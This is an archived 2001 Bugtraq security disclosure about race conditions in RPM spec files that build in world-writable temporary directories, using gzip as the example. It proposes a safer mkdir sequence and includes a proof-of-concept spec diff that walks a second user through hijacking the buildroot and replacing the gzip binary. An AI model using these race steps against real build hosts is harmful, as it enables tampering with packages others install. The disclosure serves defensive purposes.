![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
Date: Mon, 19 Mar 2001 18:52:11 +0000
From: Ian Lynagh <igloo@EARTH.LI>
Subject: RPM building races
To: BUGTRAQ@SECURITYFOCUS.COM
--6TrnltStXW4iwmi0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Hi all
Today it became necessary for me to build an RPM for the first time. To
assist my learning I chose, randomly, gzip and had a look at it's spec
file in conjunction with reading the various documentation. The first
time I saw the reference to /tmp and /var/tmp I was worried, and still
don't see why ./redhat isn't used in the same way as ./debian/tmp is.
Looking omre closely at the spec file I saw
rm -rf $RPM_BUILD_ROOT
%makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info
mkdir -p $RPM_BUILD_ROOT/usr/bin
which immediately flashed warning lights about races. In this case
rm -rf $RPM_BUILD_ROOT
mkdir -p `dirname $RPM_BUILD_ROOT`
mkdir $RPM_BUILD_ROOT
%makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info
mkdir -p $RPM_BUILD_ROOT/usr/bin
would have been safe (I believe) as the mkdir without -p will fail if
the directory exists. This allows you to alter the files in the package,
for example such that whenever anyone ran the command you got a shell
SUID their UID, if you have a shell on the machine the package is built
on while it is being built. Certainly in the case of gzip this is not
an easy race to exploit, but it exists all the same.
I have attached a patch against gzip-1.3-6 from RedHat which pauses the
build process at various points and lists commands that will build a
gzip RPM in which the gzip binary simply echos foo. To exploit this race
for real is difficult, and you need an account on the machine in
question, but even so I think problems like these should be fixed. There
may also be easier races in other packages. I am not overly familiar
with RPM, but I think the easiest solution would be to set the default
buildroot on all packages to be something like ./rpm-building/%{package}
or, slightly more work, to make sure the buildroot is secure before you
do anythign else in there.
I have not given vendors advanced warning as their build environments
are presumably secure, while it is the many sysadmins building RPMs
out there on user machines who are the ones under threat.
I haven't looked at other packages or RPM based distributions at all.
Take care
Ian
--6TrnltStXW4iwmi0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="gzip.spec.diff"
--- gzip.spec.orig Mon Mar 19 18:18:14 2001
+++ gzip.spec Mon Mar 19 18:37:55 2001
@@ -32,14 +32,37 @@
make gzip.info
%clean
+echo "
+As another user, type
+rm -rf $RPM_BUILD_ROOT
+and press enter"
+read WAIT
rm -rf $RPM_BUILD_ROOT
%install
rm -rf $RPM_BUILD_ROOT
+echo "
+As another user, type
+mkdir -p $RPM_BUILD_ROOT/usr/share/man/man1
+ln -s /tmp $RPM_BUILD_ROOT/usr/share/doc
+mkdir $RPM_BUILD_ROOT/usr/bin
+mkdir $RPM_BUILD_ROOT/bin
+mkdir $RPM_BUILD_ROOT/usr/share/info
+chmod -R a+rwx $RPM_BUILD_ROOT
+and then press enter"
+read WAIT
%makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info
mkdir -p $RPM_BUILD_ROOT/usr/bin
ln -sf ../../bin/gzip $RPM_BUILD_ROOT/usr/bin/gzip
ln -sf ../../bin/gunzip $RPM_BUILD_ROOT/usr/bin/gunzip
+echo "
+As another user, type
+rm -f $RPM_BUILD_ROOT/bin/gzip
+echo #\!/bin/sh > $RPM_BUILD_ROOT/bin/gzip
+echo echo foo >> $RPM_BUILD_ROOT/bin/gzip
+chmod +x $RPM_BUILD_ROOT/bin/gzip
+and then press enter"
+read WAIT
for i in zcmp zegrep zforce zless znew gzexe zdiff zfgrep zgrep zmore ; do
mv $RPM_BUILD_ROOT/bin/$i $RPM_BUILD_ROOT/usr/bin/$i
--6TrnltStXW4iwmi0--